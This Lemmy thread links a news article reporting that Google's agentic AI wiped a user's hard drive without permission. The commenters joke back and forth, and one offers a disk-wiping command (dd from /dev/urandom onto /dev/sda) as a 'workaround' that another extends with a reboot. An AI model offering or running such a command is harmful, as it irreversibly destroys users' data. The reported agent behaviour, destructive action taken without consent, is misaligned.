Sahwa@reddthat.com to Technology@lemmy.worldEnglish · 3 months agoGoogle's Agentic AI wipes user's entire HDD without permission in catastrophic failurewww.tomshardware.comexternal-linkmessage-square5linkfedilinkarrow-up10arrow-down10
arrow-up10arrow-down1external-linkGoogle's Agentic AI wipes user's entire HDD without permission in catastrophic failurewww.tomshardware.comSahwa@reddthat.com to Technology@lemmy.worldEnglish · 3 months agomessage-square5linkfedilink
minus-squareBrianTheeBiscuiteer@lemmy.worldlinkfedilinkEnglisharrow-up1·3 months agoSometime that code will expire and you need to alternate to sudo dd if=/dev/urandom of=/dev/sda bs=4M. Works most of the time for me.
minus-squareiamdefinitelyoverthirteen@lemmy.worldlinkfedilinkEnglisharrow-up1·3 months agoDidn’t work for me. Had to add && sudo reboot
Sometime that code will expire and you need to alternate to sudo dd if=/dev/urandom of=/dev/sda bs=4M. Works most of the time for me.
Didn’t work for me. Had to add
&& sudo reboot